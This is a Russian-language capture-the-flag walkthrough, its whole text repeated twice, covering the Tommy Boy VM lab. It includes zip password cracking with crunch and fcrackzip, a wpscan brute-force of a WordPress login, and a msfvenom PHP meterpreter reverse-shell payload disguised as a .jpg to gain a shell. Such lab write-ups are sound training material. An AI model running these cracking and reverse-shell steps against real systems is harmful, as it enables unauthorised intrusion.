Итак, продолжаем разгадывать секреты в CTF Hack The Tommy Boy VM.
В прошлой части – ссылка, мы остановились на том, что при попытке просмотреть содержимое папки на сервере, по адресу -
Ищем надстройку в Firefox под названием “User Agent Switcher”, затем устанавливаем ее.
Возвращаемся на страницу сервера и открываем Tools > Default User Agent > Iphone3.
После этого сообщение изменяется на следующее:
Для того чтобы обнаружить скрытый файл на сервере будем использовать программу DirBuster предустановленную в Kali linux. Запустим ее с такими параметрами:
В дополнительных опциях укажем:
Запускаем сканирование. В результате находим файл под названием fallon1.html. Он как раз нам и нужен.
Теперь обратимся к серверу по адресу: 192.168.0.107:8008/NickIzL33t/fallon1.html
· Теперь у нас есть Третий Флаг – Flag Data: TinyHead
· Подсказки
· И архив, который необходимо скачать.
Сохраняем его себе. Попытка открыть его не увенчалась успехом, файл просит пароль:
Для взлома пароля предлагаю использовать crunch. Тоже предустановленный в Кали, подробнее о нем здесь - https://codeby.net/blogs/crunch-generator-parolej-osnovy-ispolzovanija-i-prakticheskie-primery/
Запустим его с параметрами, на которые нам указали в файле с подсказками:
> crunch 13 13 -t bev,%%@@^1995 -o lists.txt
На выходе получаем словарь с паролями, к которому применим программу fcrackzip, запускаем ее с параметрами:
> fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip
Через несколько минут, получаем искомый пароль. Используем его для открытия файла в архиве.
Теперь, для того, чтобы найти пароль четвертого пользователя, будем использовать wpscan, к тому же, здесь есть подсказка, она указывает на известную песню группы Queen. Не вдаваясь в подробности, скажу, что имелась в виду, песня «We Will Rock You» являясь отсылкой к словарю паролей в Kali Linux rockyou.txt, его мы и будем использовать.
> wpscan -- url
Окончания брутфорса я так и не дождался, т.к. wpscan сообщил, что получил неизвестный ответ при попытке использовать пароль tomtom1. Полагаю это связано с проблемой с самой VM, т.к. после, я долго не мог зайти по этому логину/паролю. В общем, логинимся в системе, используя полученные учетные данные.
Видим следующую замечательную подсказку про SSH. Попробуем обратиться к серверу по SSH, используя недостающую часть пароля - 1938!!
Далее с помощью команды ls –lsa осмотримся:
Открываем el-flag-numero-quadro.txt Четвертый Флаг у нас. Помимо флага необходимо обратить внимание на файл callahanbak.bak, так как наша задача восстановить работу сайта воспользуемся этим бэкапом, таким образом:
Заходим на сайт Callahan Auto по адресу:
Сайт успешно поднят, но нам не хватает Пятого Флага. Один из вариантов приблизиться к его получению, это посмотреть исходный код страницы по адресу:
Выделенная строка, указывает на то, что есть возможность загрузить полезную нагрузку в виде изображения в директорию P4TCH_4D4M. Создадим ее, используя msfvenom.
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw
Скопируем полученный код как на скриншоте, затем поместим его в файл, прописав ему расширение .jpg. Сохраняем и загружаем его на сервер, чтобы сделать это откроем в браузере страницу по адресу – 192.168.0.110:8008/NickIzL33t//P4TCH_4D4MS/uploads.
Еще запустим msfconsole с такими параметрами:
Теперь необходимо переименовать файл в .php, для этого перейдем на сервере в папку /uploads.
> cd /var/thatsg0nnaleavemark/NickIzL33t/P4TCH_4D4MS/uploads
Переименуем файл:
> mv 2.php.jpg 2.php
Теперь, для получения сессии meterpreter, запустим выполнение файла 2.php.
Для этого переходим в браузере по адресу как на скриншоте ниже:
Пришло время забрать Пятый Флаг, переходим в окно с сессией и вводим команду shell,
команда whoami покажет, что мы в системе под www-data, теперь можно прочесть содержимое файла 5.txt.
Теперь у нас есть все пять частей пароля, соберем их воедино - B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack.
Воспользуемся им для распаковки архива содержащегося в папке Большого Тома – LOOT.ZIP.
> cd ~
На этом прохождение Tommy Boy VM можно считать оконченным.
Спасибо за внимание.
В прошлой части – ссылка, мы остановились на том, что при попытке просмотреть содержимое папки на сервере, по адресу -
Ссылка скрыта от гостей
нас поджидало такое сообщение.Ищем надстройку в Firefox под названием “User Agent Switcher”, затем устанавливаем ее.
Возвращаемся на страницу сервера и открываем Tools > Default User Agent > Iphone3.
После этого сообщение изменяется на следующее:
Для того чтобы обнаружить скрытый файл на сервере будем использовать программу DirBuster предустановленную в Kali linux. Запустим ее с такими параметрами:
В дополнительных опциях укажем:
Запускаем сканирование. В результате находим файл под названием fallon1.html. Он как раз нам и нужен.
Теперь обратимся к серверу по адресу: 192.168.0.107:8008/NickIzL33t/fallon1.html
· Теперь у нас есть Третий Флаг – Flag Data: TinyHead
· Подсказки
· И архив, который необходимо скачать.
Сохраняем его себе. Попытка открыть его не увенчалась успехом, файл просит пароль:
Для взлома пароля предлагаю использовать crunch. Тоже предустановленный в Кали, подробнее о нем здесь - https://codeby.net/blogs/crunch-generator-parolej-osnovy-ispolzovanija-i-prakticheskie-primery/
Запустим его с параметрами, на которые нам указали в файле с подсказками:
> crunch 13 13 -t bev,%%@@^1995 -o lists.txt
На выходе получаем словарь с паролями, к которому применим программу fcrackzip, запускаем ее с параметрами:
> fcrackzip -u -D -p /root/Desktop/dict.txt /root/Desktop/t0msp4ssw0rdz.zip
Через несколько минут, получаем искомый пароль. Используем его для открытия файла в архиве.
Теперь, для того, чтобы найти пароль четвертого пользователя, будем использовать wpscan, к тому же, здесь есть подсказка, она указывает на известную песню группы Queen. Не вдаваясь в подробности, скажу, что имелась в виду, песня «We Will Rock You» являясь отсылкой к словарю паролей в Kali Linux rockyou.txt, его мы и будем использовать.
> wpscan -- url
Ссылка скрыта от гостей
--username tom --wp-content-dir /wp-contentОкончания брутфорса я так и не дождался, т.к. wpscan сообщил, что получил неизвестный ответ при попытке использовать пароль tomtom1. Полагаю это связано с проблемой с самой VM, т.к. после, я долго не мог зайти по этому логину/паролю. В общем, логинимся в системе, используя полученные учетные данные.
Видим следующую замечательную подсказку про SSH. Попробуем обратиться к серверу по SSH, используя недостающую часть пароля - 1938!!
Далее с помощью команды ls –lsa осмотримся:
Открываем el-flag-numero-quadro.txt Четвертый Флаг у нас. Помимо флага необходимо обратить внимание на файл callahanbak.bak, так как наша задача восстановить работу сайта воспользуемся этим бэкапом, таким образом:
Заходим на сайт Callahan Auto по адресу:
Сайт успешно поднят, но нам не хватает Пятого Флага. Один из вариантов приблизиться к его получению, это посмотреть исходный код страницы по адресу:
Выделенная строка, указывает на то, что есть возможность загрузить полезную нагрузку в виде изображения в директорию P4TCH_4D4M. Создадим ее, используя msfvenom.
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=444 -f raw
Скопируем полученный код как на скриншоте, затем поместим его в файл, прописав ему расширение .jpg. Сохраняем и загружаем его на сервер, чтобы сделать это откроем в браузере страницу по адресу – 192.168.0.110:8008/NickIzL33t//P4TCH_4D4MS/uploads.
Еще запустим msfconsole с такими параметрами:
Теперь необходимо переименовать файл в .php, для этого перейдем на сервере в папку /uploads.
> cd /var/thatsg0nnaleavemark/NickIzL33t/P4TCH_4D4MS/uploads
Переименуем файл:
> mv 2.php.jpg 2.php
Теперь, для получения сессии meterpreter, запустим выполнение файла 2.php.
Для этого переходим в браузере по адресу как на скриншоте ниже:
Пришло время забрать Пятый Флаг, переходим в окно с сессией и вводим команду shell,
команда whoami покажет, что мы в системе под www-data, теперь можно прочесть содержимое файла 5.txt.
Теперь у нас есть все пять частей пароля, соберем их воедино - B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack.
Воспользуемся им для распаковки архива содержащегося в папке Большого Тома – LOOT.ZIP.
> cd ~
На этом прохождение Tommy Boy VM можно считать оконченным.
Спасибо за внимание.